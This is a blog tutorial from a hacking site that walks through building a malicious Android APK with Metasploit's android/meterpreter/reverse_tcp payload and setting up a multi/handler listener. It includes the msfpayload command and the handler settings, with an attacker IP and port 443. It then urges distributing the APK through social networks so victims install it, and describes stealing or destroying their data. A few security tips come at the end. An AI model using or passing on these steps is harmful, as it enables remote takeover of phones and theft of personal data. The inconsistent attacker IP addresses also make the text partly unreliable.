Trending
Loading...

Hacking Android Smartphone Tutorial using Metasploit

 


Hacking Android Smartphone Tutorial using Metasploit 

 

Image result for android hacking with metasploit

 

As we  know  Nowadays mobile users are increasing day by day you  now  well  this  fact,So  due  to  this   the security threat is also increasing together with the growth of its users. So  for  the  requet  of  many readers  today I am  going  to  show   how to Hacking Android Smartphone Tutorial using Metasploit. if  you  think  Why we choose android phone for this tutorial? simply because  of   lately android phone growing very fast worldwide or  we  can say  all  over  the  world.The users  of  android  phone  rapidly   increase  because  of  country  China.China  offered   android phone for only US$ 35 it's one of the reason why android growing fast.
if you    don't  know  actually  what  is  android  simply  see  bellow wikipedia  article  about android

What is android? according to wikipedia:


Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.

   according to wikipedia: what is APK? 


    Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
start  now  today's  tutorial:

before  going  to  start  this  aticle  you  put  some  thing  keep   in mind , Here is some initial information for this tutorial:

1) Attacker IP address: 192.168.8.94

2) Attacker port to receive connection: 443

what  is   your  Requirements:


1. first  you  need Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. obiously you need  a  Android smartphone (we use LG android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

step:1). first  of  all  simply  Open terminal if  you  don't  know  how  simply  press CTRL + ALT + T

step:2). After  that  We will utilize Metasploit payload framework to create exploit for this tutorial.

    msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

here  we  allready  describe  what  is attacker   IP address  and  here  we  considered  ip  as  182.158.18.67, if  you  don't  understand  please  see beelow  picture

 

step:3) .This  is   Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above.simply  goto  console if  you  don't  know  how  to   go  to  consol window  simply   Type msfconsole to go to Metasploit console.




Info:
 use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

step:4) .after  doing  this   The next step we need to configure the switch for the Metasploit payload we already specified in step 3.





Info:

    set lhost 192.168.8.94 –> attacker IP address
    set lport 443 –> port to listen the reverse connection
     exploit –> start to listen incoming connection

step:5) . Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet  and  social  networking  sites   are  the good place for distribution )

step:6) . Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:



step:7).what  its  mean , It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone he  can  steal  all  information  of  victim even  sometime  destroy  all  sencitive  data of  mobile.



security  tips:

1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

 

3.always  turn  of  unknown  scource  installation  feature ,every phone  have  this  feature  in  security  tab  under  mobile  setting

Share this article if you found this post was useful:

0 comments:

Post a Comment

please feel free to comment

Copyright © 2012 HacksandCracks All Right Reserved
Designed by Odd Themes
Back To Top